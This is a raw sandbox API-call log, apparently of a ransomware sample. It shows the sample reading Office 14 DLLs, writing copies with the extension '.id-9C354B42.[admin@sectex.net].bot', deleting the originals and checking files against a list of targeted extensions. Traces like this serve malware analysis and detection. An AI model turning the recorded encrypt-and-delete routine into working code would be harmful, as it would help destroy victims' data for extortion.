	[0058.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll")) returned 0x20
	[0058.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0058.111] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.111] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0058.111] GetLastError () returned 0x0
	[0058.111] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0xf73a8, lpOverlapped=0x0) returned 1
	[0058.131] WriteFile (in: hFile=0x1b0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xf73b0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xf73b0, lpOverlapped=0x0) returned 1
	[0058.351] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.351] WriteFile (in: hFile=0x1b0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0058.352] SetEndOfFile (hFile=0x1b0) returned 1
	[0058.352] CloseHandle (hObject=0x1b0) returned 1
	[0058.352] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.352] SetEndOfFile (hFile=0x1a8) returned 1
	[0058.360] CloseHandle (hObject=0x1a8) returned 1
	[0058.360] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.360] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll")) returned 1
	[0058.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65
	[0058.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65
	[0058.360] lstrlenW (lpString=".doc") returned 4
	[0058.360] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.360] lstrlenW (lpString=".docx") returned 5
	[0058.360] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0058.360] lstrlenW (lpString=".pdf") returned 4
	[0058.361] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.361] lstrlenW (lpString=".xls") returned 4
	[0058.361] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.361] lstrlenW (lpString=".xlsx") returned 5
	[0058.361] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0058.361] lstrlenW (lpString=".ppt") returned 4
	[0058.361] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65
	[0058.361] lstrlenW (lpString=".zip") returned 4
	[0058.361] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.361] lstrlenW (lpString=".rar") returned 4
	[0058.361] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.361] lstrlenW (lpString=".bz2") returned 4
	[0058.361] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.361] lstrlenW (lpString=".7z") returned 3
	[0058.361] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65
	[0058.361] lstrlenW (lpString=".dbf") returned 4
	[0058.361] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65
	[0058.361] lstrlenW (lpString=".1cd") returned 4
	[0058.361] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65
	[0058.361] lstrlenW (lpString=".jpg") returned 4
	[0058.361] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65
	[0058.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65
	[0058.361] lstrlenW (lpString=".doc") returned 4
	[0058.361] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.361] lstrlenW (lpString=".docx") returned 5
	[0058.361] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0058.361] lstrlenW (lpString=".pdf") returned 4
	[0058.361] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.361] lstrlenW (lpString=".xls") returned 4
	[0058.362] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.362] lstrlenW (lpString=".xlsx") returned 5
	[0058.362] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0058.362] lstrlenW (lpString=".ppt") returned 4
	[0058.362] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65
	[0058.362] lstrlenW (lpString=".zip") returned 4
	[0058.362] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.362] lstrlenW (lpString=".rar") returned 4
	[0058.362] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.362] lstrlenW (lpString=".bz2") returned 4
	[0058.362] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.362] lstrlenW (lpString=".7z") returned 3
	[0058.362] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65
	[0058.362] lstrlenW (lpString=".dbf") returned 4
	[0058.362] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65
	[0058.362] lstrlenW (lpString=".1cd") returned 4
	[0058.362] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65
	[0058.362] lstrlenW (lpString=".jpg") returned 4
	[0058.362] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.362] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.362] lstrlenW (lpString="ACEODDBS.DLL") returned 12
	[0058.362] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0058.363] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=15800) returned 1
	[0058.363] CloseHandle (hObject=0x1a8) returned 1
	[0058.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll")) returned 0x20
	[0058.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.363] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0058.363] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.363] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.363] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0058.364] GetLastError () returned 0x0
	[0058.364] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x3db8, lpOverlapped=0x0) returned 1
	[0058.365] WriteFile (in: hFile=0x1b0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x3dc0, lpOverlapped=0x0) returned 1
	[0058.366] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.366] WriteFile (in: hFile=0x1b0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.367] SetEndOfFile (hFile=0x1b0) returned 1
	[0058.367] CloseHandle (hObject=0x1b0) returned 1
	[0058.367] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.367] SetEndOfFile (hFile=0x1a8) returned 1
	[0058.368] CloseHandle (hObject=0x1a8) returned 1
	[0058.368] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.368] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll")) returned 1
	[0058.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68
	[0058.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68
	[0058.368] lstrlenW (lpString=".doc") returned 4
	[0058.368] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.368] lstrlenW (lpString=".docx") returned 5
	[0058.368] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0058.368] lstrlenW (lpString=".pdf") returned 4
	[0058.368] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.368] lstrlenW (lpString=".xls") returned 4
	[0058.368] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.368] lstrlenW (lpString=".xlsx") returned 5
	[0058.368] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0058.368] lstrlenW (lpString=".ppt") returned 4
	[0058.369] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68
	[0058.369] lstrlenW (lpString=".zip") returned 4
	[0058.369] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.369] lstrlenW (lpString=".rar") returned 4
	[0058.369] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.369] lstrlenW (lpString=".bz2") returned 4
	[0058.369] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.369] lstrlenW (lpString=".7z") returned 3
	[0058.369] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68
	[0058.369] lstrlenW (lpString=".dbf") returned 4
	[0058.369] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68
	[0058.369] lstrlenW (lpString=".1cd") returned 4
	[0058.369] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68
	[0058.369] lstrlenW (lpString=".jpg") returned 4
	[0058.369] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68
	[0058.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68
	[0058.369] lstrlenW (lpString=".doc") returned 4
	[0058.369] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.369] lstrlenW (lpString=".docx") returned 5
	[0058.369] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0058.369] lstrlenW (lpString=".pdf") returned 4
	[0058.369] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.369] lstrlenW (lpString=".xls") returned 4
	[0058.369] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.369] lstrlenW (lpString=".xlsx") returned 5
	[0058.369] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0058.369] lstrlenW (lpString=".ppt") returned 4
	[0058.369] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68
	[0058.370] lstrlenW (lpString=".zip") returned 4
	[0058.370] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.370] lstrlenW (lpString=".rar") returned 4
	[0058.370] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.370] lstrlenW (lpString=".bz2") returned 4
	[0058.370] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.370] lstrlenW (lpString=".7z") returned 3
	[0058.370] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68
	[0058.370] lstrlenW (lpString=".dbf") returned 4
	[0058.370] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68
	[0058.370] lstrlenW (lpString=".1cd") returned 4
	[0058.370] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68
	[0058.370] lstrlenW (lpString=".jpg") returned 4
	[0058.370] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.370] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.370] lstrlenW (lpString="ACEODEXL.DLL") returned 12
	[0058.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0058.594] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=15800) returned 1
	[0058.594] CloseHandle (hObject=0x230) returned 1
	[0058.594] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll")) returned 0x20
	[0058.594] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.594] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0058.594] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.594] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.594] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0058.611] GetLastError () returned 0x0
	[0058.611] ReadFile (in: hFile=0x230, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x3db8, lpOverlapped=0x0) returned 1
	[0058.612] WriteFile (in: hFile=0x228, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x3dc0, lpOverlapped=0x0) returned 1
	[0058.613] ReadFile (in: hFile=0x230, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.613] WriteFile (in: hFile=0x228, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.614] SetEndOfFile (hFile=0x228) returned 1
	[0058.616] CloseHandle (hObject=0x228) returned 1
	[0058.616] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.616] SetEndOfFile (hFile=0x230) returned 1
	[0058.617] CloseHandle (hObject=0x230) returned 1
	[0058.617] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.617] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll")) returned 1
	[0058.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68
	[0058.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68
	[0058.618] lstrlenW (lpString=".doc") returned 4
	[0058.618] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.618] lstrlenW (lpString=".docx") returned 5
	[0058.618] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0058.618] lstrlenW (lpString=".pdf") returned 4
	[0058.618] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.618] lstrlenW (lpString=".xls") returned 4
	[0058.618] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.618] lstrlenW (lpString=".xlsx") returned 5
	[0058.618] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0058.618] lstrlenW (lpString=".ppt") returned 4
	[0058.618] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68
	[0058.618] lstrlenW (lpString=".zip") returned 4
	[0058.618] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.618] lstrlenW (lpString=".rar") returned 4
	[0058.618] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.618] lstrlenW (lpString=".bz2") returned 4
	[0058.618] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.618] lstrlenW (lpString=".7z") returned 3
	[0058.618] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68
	[0058.618] lstrlenW (lpString=".dbf") returned 4
	[0058.618] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68
	[0058.618] lstrlenW (lpString=".1cd") returned 4
	[0058.618] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68
	[0058.618] lstrlenW (lpString=".jpg") returned 4
	[0058.619] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68
	[0058.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68
	[0058.619] lstrlenW (lpString=".doc") returned 4
	[0058.619] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.619] lstrlenW (lpString=".docx") returned 5
	[0058.619] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0058.619] lstrlenW (lpString=".pdf") returned 4
	[0058.619] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.619] lstrlenW (lpString=".xls") returned 4
	[0058.619] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.619] lstrlenW (lpString=".xlsx") returned 5
	[0058.619] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0058.619] lstrlenW (lpString=".ppt") returned 4
	[0058.619] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68
	[0058.619] lstrlenW (lpString=".zip") returned 4
	[0058.619] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.619] lstrlenW (lpString=".rar") returned 4
	[0058.619] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.619] lstrlenW (lpString=".bz2") returned 4
	[0058.619] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.619] lstrlenW (lpString=".7z") returned 3
	[0058.619] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68
	[0058.619] lstrlenW (lpString=".dbf") returned 4
	[0058.619] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68
	[0058.619] lstrlenW (lpString=".1cd") returned 4
	[0058.619] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68
	[0058.619] lstrlenW (lpString=".jpg") returned 4
	[0058.619] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.620] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.620] lstrlenW (lpString="ACERCLR.DLL") returned 11
	[0058.620] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0058.621] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=55744) returned 1
	[0058.621] CloseHandle (hObject=0x230) returned 1
	[0058.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll")) returned 0x20
